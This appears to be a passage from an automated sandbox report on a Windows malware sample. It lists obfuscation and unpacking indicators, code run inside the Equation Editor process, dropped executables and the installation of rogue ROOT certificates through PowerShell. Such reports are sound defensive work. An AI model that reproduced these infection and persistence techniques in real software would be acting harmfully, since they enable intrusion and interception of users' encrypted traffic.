                  Source: Binary string: DGaD.pdbSHA256 source: cdlpohalgate39567.exe, 00000005.00000000.428364525.0000000001012000.00000020.00000001.01000000.00000004.sdmp, cdlpohalgate39567.exe.2.dr, pgTQ4mfZBbJhpdd[1].exe.2.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 5.2.cdlpohalgate39567.exe.350ac68.6.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, nW3sEsBesrd65eePGN.cs.Net Code: VAmkY83jW4FFbrfoZ9w System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, nW3sEsBesrd65eePGN.cs.Net Code: VAmkY83jW4FFbrfoZ9w System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohalgate39567.exe.3521e88.5.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohalgate39567.exe.560000.0.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, nW3sEsBesrd65eePGN.cs.Net Code: VAmkY83jW4FFbrfoZ9w System.Reflection.Assembly.Load(byte[])
                  Source: pgTQ4mfZBbJhpdd[1].exe.2.drStatic PE information: 0xFAF3F458 [Sun Jun 3 05:30:00 2103 UTC]
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00688F60 push eax; retf 2_2_00688F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00680029 push eax; retf 2_2_006801F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006967EC push esp; ret 2_2_006967EF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006967E4 push esp; ret 2_2_006967E7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006969C0 push ebp; ret 2_2_006969C3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006969C7 push ebp; ret 2_2_006969CB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006967D8 push dword ptr [esi+edi*2+54h]; ret 2_2_006967DF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006969D0 push ebp; ret 2_2_006969D3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006967A6 push esp; ret 2_2_006967A7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006801F8 push eax; retf 2_2_006801F5
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0025217B push ebx; iretd 7_2_002521EA
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_0025214B push ebx; iretd 7_2_002521EA
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeCode function: 7_2_006490F8 pushfd ; retn 0061h7_2_006490F9
                  Source: pgTQ4mfZBbJhpdd[1].exe.2.drStatic PE information: section name: .text entropy: 7.715403926805422
                  Source: cdlpohalgate39567.exe.2.drStatic PE information: section name: .text entropy: 7.715403926805422
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, wZYymHrFoY38S2MTRa.csHigh entropy of concatenated method names: 'P5vPIkYb5p', 'civPRMsp6N', 'YsGPMjEgui', 'z6DMiIJ9r0', 'MG4MztyE4i', 'W3APl0Fqgn', 'qeHPp6nZ7J', 'j31P6xJ0Wl', 'RywPAweWqO', 'FoaPfgC5hP'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, uMam44yANcqB9ltWGZ.csHigh entropy of concatenated method names: 'EFLF2ti1sN', 'L1JFiB3ifx', 'DQBdlj4DYx', 'G6fdpV2rY4', 'UtDFxAraSm', 'vvwFXMALoa', 'eqfF9eoeAe', 'RDuFthUu3B', 'kDOFVPKfnx', 'no7Fkox2Sp'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, RacRVlod0sw8B9ouMm.csHigh entropy of concatenated method names: 'NW4FQ5oprB', 'UDhFLxAAki', 'ToString', 'hRrFIKQVZ1', 'kGcFjT9GGM', 'ecBFRPoHYB', 'eCjFgXlg2f', 'ubBFMpHgPD', 'YtCFPNs2Q4', 'QBOFBMDkAa'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, FMNSgKjiBI0GqqBPyE.csHigh entropy of concatenated method names: 'Dispose', 'Yelp3ptOiC', 'wfU6hkDkoj', 'ICdTTuDWyR', 'xTgpiRkZ6q', 'GijpzoBDnR', 'ProcessDialogKey', 'h306ltFFNc', 'kC96pw2GeY', 'wZw663Bq1m'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, VF3gsb4AyHhvKmAXXL.csHigh entropy of concatenated method names: 'kQ7jtWUk5H', 'DcwjVuHGuf', 'TSMjk1eh5B', 'JbrjoOka2A', 'S9ajTCpwVU', 'G5YjyBkQ7N', 'fxQjs4hqny', 'pJgj2ENsdQ', 'Q7Bj3PAsxd', 'parjiOTdjP'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, nW3sEsBesrd65eePGN.csHigh entropy of concatenated method names: 'Q8dAWROUoP', 'E1XAInIrD1', 'm7oAjjBvEo', 'jD1ARx19N2', 'hpVAgt3rQg', 'gZcAMoyKTn', 'OVTAPf31Wg', 'gF0ABNf9Iu', 'wrSADHabtU', 'tPfAQrXbPs'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, q0oPAczaM2AlECiIlp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'U6naUPceOL', 'i8xaK8buAo', 'uURa88pl01', 's3eaFF4lyn', 'mBkad6c3dK', 'XOMaaQB4rk', 'xDuaCwOPA6'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, UubkCypA6UxGGlIjJaS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KoBCtU38j1', 'bcfCVygkhX', 'R08Ck6muVE', 'yBFCoJwERI', 'uOSCTMd6Zc', 'PdSCy8uWVu', 'MldCsVmK11'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, PS1QYGfvWduZHVD3VT.csHigh entropy of concatenated method names: 'alypPF3gsb', 'cyHpBhvKmA', 'udppQGIUSw', 'KvSpLndPID', 'F2DpKWW8Kp', 'qwXp8m2Ucf', 'KiQ8bdbf5g1EPU1Xki', 'A4oar711htTpPq2S4r', 'Q8jppFU7f1', 'ExIpALIFas'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, yxy520tCOSSyhHgTUP.csHigh entropy of concatenated method names: 'SoIKwRkTVl', 'hA5KXkLYqH', 'RJCKtUXhsi', 'sUxKVTtyYC', 'rNHKhjfsqD', 'd70KbI9ylM', 'jAlKHMh6S9', 'TPYKNltbGE', 'udnKcGbIHy', 'b2fKrhcID4'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, i6hDKhuOFikgkptYVR.csHigh entropy of concatenated method names: 'rVVPmqi69N', 'NR6PGH5C9m', 'rLHPZMi9TT', 'bZEPvxJqap', 'XxEPYBN12N', 'HNRPq6PKxW', 'ScdPnARZtT', 'CfjP4G2ZNn', 'rYIP7N6qab', 'cFvPOXxo94'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, HUU0lO6rFnmxGghwkw.csHigh entropy of concatenated method names: 'JNsZVbgKZ', 'hiTvLYXRm', 'uoYq03sAg', 'YVUnvPFHM', 'dWF7McE9h', 'nt8OGpyxu', 'vuN8429X7BAgsoh5dW', 'mURjx9tTBQRQyhjRN6', 'CindrTXgt', 'NGsCnq6Uc'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, wtFFNc3BC9w2GeYJZw.csHigh entropy of concatenated method names: 'h9AdeYDZoU', 'ymhdh7brKY', 'X4udbxiSui', 'DJxdHsmYER', 'FFndtYAYnY', 'r4hdNSg0cm', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, pKpdwXem2UcftDnZyy.csHigh entropy of concatenated method names: 'CjiMW4YWE9', 'E2tMjfQxrn', 'o4PMgXBHdJ', 'ELeMPJhuKJ', 'IdvMBROhcy', 'GqNgTIy2O0', 'ecggyK1H8V', 'c5HgsI1JeA', 'kyGg29HsT1', 'YHBg3PpiDA'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, UgRkZ62qeijoBDnRg3.csHigh entropy of concatenated method names: 'QYCdIZLXAw', 'EPfdjFxx9X', 'Hy8dR74KsC', 'IpvdgFQfSW', 'n9DdMY1EC4', 'Ld4dP0u3kf', 'P78dBgduJ5', 'wpQdDZvjiG', 'rvGdQ2fj3H', 'OptdL0W7Gb'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, SMpCmI9EORh017fyt8.csHigh entropy of concatenated method names: 'qHgU4612XJ', 'IdOU75WmpW', 'xHGUe7qLea', 'DXOUhKYGpV', 'FPTUHia0Ke', 'hK3UNZZTu7', 'DsJUrH3Yl5', 'iAZUEbyyIp', 'V3FUwD7Nsq', 'SfRUxApFUm'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, l9arAZplXQNfZvfcDbW.csHigh entropy of concatenated method names: 'l8yamo2ja9', 'fIQaGiSbWZ', 'iTMaZ4uVrX', 'X5aavJG3fF', 'fP3aYO2Dik', 'mY3aq0cMOk', 'nNaanfwKQF', 'IhGa4EJLYY', 'B4La7dN4oQ', 'db8aOrBNLH'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, JonEZ17dpGIUSwcvSn.csHigh entropy of concatenated method names: 'zW0RvEqsoX', 'I6gRqpZTm5', 'e09R4QYYeO', 'dJ5R7Zv1Zf', 'KfkRK4n25A', 'wM6R8YeJc9', 'IrpRFRkb5W', 'RdGRdxLZGM', 'gPgRaTCpMG', 'LhbRCTVh3d'
                  Source: 5.2.cdlpohalgate39567.exe.8cd0000.7.raw.unpack, YBq1mCiwEAnc0RFD2k.csHigh entropy of concatenated method names: 'lgRapjRQTY', 'V3jaAJUHJF', 'xdUafJLYTE', 'PsHaI4RFmZ', 'rYKajmIhYd', 'udCagC8N8N', 'hpfaMg8TbL', 'L6Mdsw2GmY', 'lSNd2ifFsy', 'PqPd38THMd'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, wZYymHrFoY38S2MTRa.csHigh entropy of concatenated method names: 'P5vPIkYb5p', 'civPRMsp6N', 'YsGPMjEgui', 'z6DMiIJ9r0', 'MG4MztyE4i', 'W3APl0Fqgn', 'qeHPp6nZ7J', 'j31P6xJ0Wl', 'RywPAweWqO', 'FoaPfgC5hP'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, uMam44yANcqB9ltWGZ.csHigh entropy of concatenated method names: 'EFLF2ti1sN', 'L1JFiB3ifx', 'DQBdlj4DYx', 'G6fdpV2rY4', 'UtDFxAraSm', 'vvwFXMALoa', 'eqfF9eoeAe', 'RDuFthUu3B', 'kDOFVPKfnx', 'no7Fkox2Sp'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, RacRVlod0sw8B9ouMm.csHigh entropy of concatenated method names: 'NW4FQ5oprB', 'UDhFLxAAki', 'ToString', 'hRrFIKQVZ1', 'kGcFjT9GGM', 'ecBFRPoHYB', 'eCjFgXlg2f', 'ubBFMpHgPD', 'YtCFPNs2Q4', 'QBOFBMDkAa'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, FMNSgKjiBI0GqqBPyE.csHigh entropy of concatenated method names: 'Dispose', 'Yelp3ptOiC', 'wfU6hkDkoj', 'ICdTTuDWyR', 'xTgpiRkZ6q', 'GijpzoBDnR', 'ProcessDialogKey', 'h306ltFFNc', 'kC96pw2GeY', 'wZw663Bq1m'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, VF3gsb4AyHhvKmAXXL.csHigh entropy of concatenated method names: 'kQ7jtWUk5H', 'DcwjVuHGuf', 'TSMjk1eh5B', 'JbrjoOka2A', 'S9ajTCpwVU', 'G5YjyBkQ7N', 'fxQjs4hqny', 'pJgj2ENsdQ', 'Q7Bj3PAsxd', 'parjiOTdjP'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, nW3sEsBesrd65eePGN.csHigh entropy of concatenated method names: 'Q8dAWROUoP', 'E1XAInIrD1', 'm7oAjjBvEo', 'jD1ARx19N2', 'hpVAgt3rQg', 'gZcAMoyKTn', 'OVTAPf31Wg', 'gF0ABNf9Iu', 'wrSADHabtU', 'tPfAQrXbPs'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, q0oPAczaM2AlECiIlp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'U6naUPceOL', 'i8xaK8buAo', 'uURa88pl01', 's3eaFF4lyn', 'mBkad6c3dK', 'XOMaaQB4rk', 'xDuaCwOPA6'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, UubkCypA6UxGGlIjJaS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KoBCtU38j1', 'bcfCVygkhX', 'R08Ck6muVE', 'yBFCoJwERI', 'uOSCTMd6Zc', 'PdSCy8uWVu', 'MldCsVmK11'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, PS1QYGfvWduZHVD3VT.csHigh entropy of concatenated method names: 'alypPF3gsb', 'cyHpBhvKmA', 'udppQGIUSw', 'KvSpLndPID', 'F2DpKWW8Kp', 'qwXp8m2Ucf', 'KiQ8bdbf5g1EPU1Xki', 'A4oar711htTpPq2S4r', 'Q8jppFU7f1', 'ExIpALIFas'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, yxy520tCOSSyhHgTUP.csHigh entropy of concatenated method names: 'SoIKwRkTVl', 'hA5KXkLYqH', 'RJCKtUXhsi', 'sUxKVTtyYC', 'rNHKhjfsqD', 'd70KbI9ylM', 'jAlKHMh6S9', 'TPYKNltbGE', 'udnKcGbIHy', 'b2fKrhcID4'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, i6hDKhuOFikgkptYVR.csHigh entropy of concatenated method names: 'rVVPmqi69N', 'NR6PGH5C9m', 'rLHPZMi9TT', 'bZEPvxJqap', 'XxEPYBN12N', 'HNRPq6PKxW', 'ScdPnARZtT', 'CfjP4G2ZNn', 'rYIP7N6qab', 'cFvPOXxo94'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, HUU0lO6rFnmxGghwkw.csHigh entropy of concatenated method names: 'JNsZVbgKZ', 'hiTvLYXRm', 'uoYq03sAg', 'YVUnvPFHM', 'dWF7McE9h', 'nt8OGpyxu', 'vuN8429X7BAgsoh5dW', 'mURjx9tTBQRQyhjRN6', 'CindrTXgt', 'NGsCnq6Uc'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, wtFFNc3BC9w2GeYJZw.csHigh entropy of concatenated method names: 'h9AdeYDZoU', 'ymhdh7brKY', 'X4udbxiSui', 'DJxdHsmYER', 'FFndtYAYnY', 'r4hdNSg0cm', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, pKpdwXem2UcftDnZyy.csHigh entropy of concatenated method names: 'CjiMW4YWE9', 'E2tMjfQxrn', 'o4PMgXBHdJ', 'ELeMPJhuKJ', 'IdvMBROhcy', 'GqNgTIy2O0', 'ecggyK1H8V', 'c5HgsI1JeA', 'kyGg29HsT1', 'YHBg3PpiDA'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, UgRkZ62qeijoBDnRg3.csHigh entropy of concatenated method names: 'QYCdIZLXAw', 'EPfdjFxx9X', 'Hy8dR74KsC', 'IpvdgFQfSW', 'n9DdMY1EC4', 'Ld4dP0u3kf', 'P78dBgduJ5', 'wpQdDZvjiG', 'rvGdQ2fj3H', 'OptdL0W7Gb'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, SMpCmI9EORh017fyt8.csHigh entropy of concatenated method names: 'qHgU4612XJ', 'IdOU75WmpW', 'xHGUe7qLea', 'DXOUhKYGpV', 'FPTUHia0Ke', 'hK3UNZZTu7', 'DsJUrH3Yl5', 'iAZUEbyyIp', 'V3FUwD7Nsq', 'SfRUxApFUm'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, l9arAZplXQNfZvfcDbW.csHigh entropy of concatenated method names: 'l8yamo2ja9', 'fIQaGiSbWZ', 'iTMaZ4uVrX', 'X5aavJG3fF', 'fP3aYO2Dik', 'mY3aq0cMOk', 'nNaanfwKQF', 'IhGa4EJLYY', 'B4La7dN4oQ', 'db8aOrBNLH'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, JonEZ17dpGIUSwcvSn.csHigh entropy of concatenated method names: 'zW0RvEqsoX', 'I6gRqpZTm5', 'e09R4QYYeO', 'dJ5R7Zv1Zf', 'KfkRK4n25A', 'wM6R8YeJc9', 'IrpRFRkb5W', 'RdGRdxLZGM', 'gPgRaTCpMG', 'LhbRCTVh3d'
                  Source: 5.2.cdlpohalgate39567.exe.3fe5508.2.raw.unpack, YBq1mCiwEAnc0RFD2k.csHigh entropy of concatenated method names: 'lgRapjRQTY', 'V3jaAJUHJF', 'xdUafJLYTE', 'PsHaI4RFmZ', 'rYKajmIhYd', 'udCagC8N8N', 'hpfaMg8TbL', 'L6Mdsw2GmY', 'lSNd2ifFsy', 'PqPd38THMd'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, wZYymHrFoY38S2MTRa.csHigh entropy of concatenated method names: 'P5vPIkYb5p', 'civPRMsp6N', 'YsGPMjEgui', 'z6DMiIJ9r0', 'MG4MztyE4i', 'W3APl0Fqgn', 'qeHPp6nZ7J', 'j31P6xJ0Wl', 'RywPAweWqO', 'FoaPfgC5hP'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, uMam44yANcqB9ltWGZ.csHigh entropy of concatenated method names: 'EFLF2ti1sN', 'L1JFiB3ifx', 'DQBdlj4DYx', 'G6fdpV2rY4', 'UtDFxAraSm', 'vvwFXMALoa', 'eqfF9eoeAe', 'RDuFthUu3B', 'kDOFVPKfnx', 'no7Fkox2Sp'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, RacRVlod0sw8B9ouMm.csHigh entropy of concatenated method names: 'NW4FQ5oprB', 'UDhFLxAAki', 'ToString', 'hRrFIKQVZ1', 'kGcFjT9GGM', 'ecBFRPoHYB', 'eCjFgXlg2f', 'ubBFMpHgPD', 'YtCFPNs2Q4', 'QBOFBMDkAa'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, FMNSgKjiBI0GqqBPyE.csHigh entropy of concatenated method names: 'Dispose', 'Yelp3ptOiC', 'wfU6hkDkoj', 'ICdTTuDWyR', 'xTgpiRkZ6q', 'GijpzoBDnR', 'ProcessDialogKey', 'h306ltFFNc', 'kC96pw2GeY', 'wZw663Bq1m'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, VF3gsb4AyHhvKmAXXL.csHigh entropy of concatenated method names: 'kQ7jtWUk5H', 'DcwjVuHGuf', 'TSMjk1eh5B', 'JbrjoOka2A', 'S9ajTCpwVU', 'G5YjyBkQ7N', 'fxQjs4hqny', 'pJgj2ENsdQ', 'Q7Bj3PAsxd', 'parjiOTdjP'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, nW3sEsBesrd65eePGN.csHigh entropy of concatenated method names: 'Q8dAWROUoP', 'E1XAInIrD1', 'm7oAjjBvEo', 'jD1ARx19N2', 'hpVAgt3rQg', 'gZcAMoyKTn', 'OVTAPf31Wg', 'gF0ABNf9Iu', 'wrSADHabtU', 'tPfAQrXbPs'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, q0oPAczaM2AlECiIlp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'U6naUPceOL', 'i8xaK8buAo', 'uURa88pl01', 's3eaFF4lyn', 'mBkad6c3dK', 'XOMaaQB4rk', 'xDuaCwOPA6'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, UubkCypA6UxGGlIjJaS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KoBCtU38j1', 'bcfCVygkhX', 'R08Ck6muVE', 'yBFCoJwERI', 'uOSCTMd6Zc', 'PdSCy8uWVu', 'MldCsVmK11'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, PS1QYGfvWduZHVD3VT.csHigh entropy of concatenated method names: 'alypPF3gsb', 'cyHpBhvKmA', 'udppQGIUSw', 'KvSpLndPID', 'F2DpKWW8Kp', 'qwXp8m2Ucf', 'KiQ8bdbf5g1EPU1Xki', 'A4oar711htTpPq2S4r', 'Q8jppFU7f1', 'ExIpALIFas'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, yxy520tCOSSyhHgTUP.csHigh entropy of concatenated method names: 'SoIKwRkTVl', 'hA5KXkLYqH', 'RJCKtUXhsi', 'sUxKVTtyYC', 'rNHKhjfsqD', 'd70KbI9ylM', 'jAlKHMh6S9', 'TPYKNltbGE', 'udnKcGbIHy', 'b2fKrhcID4'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, i6hDKhuOFikgkptYVR.csHigh entropy of concatenated method names: 'rVVPmqi69N', 'NR6PGH5C9m', 'rLHPZMi9TT', 'bZEPvxJqap', 'XxEPYBN12N', 'HNRPq6PKxW', 'ScdPnARZtT', 'CfjP4G2ZNn', 'rYIP7N6qab', 'cFvPOXxo94'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, HUU0lO6rFnmxGghwkw.csHigh entropy of concatenated method names: 'JNsZVbgKZ', 'hiTvLYXRm', 'uoYq03sAg', 'YVUnvPFHM', 'dWF7McE9h', 'nt8OGpyxu', 'vuN8429X7BAgsoh5dW', 'mURjx9tTBQRQyhjRN6', 'CindrTXgt', 'NGsCnq6Uc'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, wtFFNc3BC9w2GeYJZw.csHigh entropy of concatenated method names: 'h9AdeYDZoU', 'ymhdh7brKY', 'X4udbxiSui', 'DJxdHsmYER', 'FFndtYAYnY', 'r4hdNSg0cm', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, pKpdwXem2UcftDnZyy.csHigh entropy of concatenated method names: 'CjiMW4YWE9', 'E2tMjfQxrn', 'o4PMgXBHdJ', 'ELeMPJhuKJ', 'IdvMBROhcy', 'GqNgTIy2O0', 'ecggyK1H8V', 'c5HgsI1JeA', 'kyGg29HsT1', 'YHBg3PpiDA'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, UgRkZ62qeijoBDnRg3.csHigh entropy of concatenated method names: 'QYCdIZLXAw', 'EPfdjFxx9X', 'Hy8dR74KsC', 'IpvdgFQfSW', 'n9DdMY1EC4', 'Ld4dP0u3kf', 'P78dBgduJ5', 'wpQdDZvjiG', 'rvGdQ2fj3H', 'OptdL0W7Gb'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, SMpCmI9EORh017fyt8.csHigh entropy of concatenated method names: 'qHgU4612XJ', 'IdOU75WmpW', 'xHGUe7qLea', 'DXOUhKYGpV', 'FPTUHia0Ke', 'hK3UNZZTu7', 'DsJUrH3Yl5', 'iAZUEbyyIp', 'V3FUwD7Nsq', 'SfRUxApFUm'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, l9arAZplXQNfZvfcDbW.csHigh entropy of concatenated method names: 'l8yamo2ja9', 'fIQaGiSbWZ', 'iTMaZ4uVrX', 'X5aavJG3fF', 'fP3aYO2Dik', 'mY3aq0cMOk', 'nNaanfwKQF', 'IhGa4EJLYY', 'B4La7dN4oQ', 'db8aOrBNLH'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, JonEZ17dpGIUSwcvSn.csHigh entropy of concatenated method names: 'zW0RvEqsoX', 'I6gRqpZTm5', 'e09R4QYYeO', 'dJ5R7Zv1Zf', 'KfkRK4n25A', 'wM6R8YeJc9', 'IrpRFRkb5W', 'RdGRdxLZGM', 'gPgRaTCpMG', 'LhbRCTVh3d'
                  Source: 5.2.cdlpohalgate39567.exe.3f60ce8.4.raw.unpack, YBq1mCiwEAnc0RFD2k.csHigh entropy of concatenated method names: 'lgRapjRQTY', 'V3jaAJUHJF', 'xdUafJLYTE', 'PsHaI4RFmZ', 'rYKajmIhYd', 'udCagC8N8N', 'hpfaMg8TbL', 'L6Mdsw2GmY', 'lSNd2ifFsy', 'PqPd38THMd'

                  Persistence and Installation Behavior

                  barindex
                  Installs new ROOT certificates
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pgTQ4mfZBbJhpdd[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohalgate39567.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
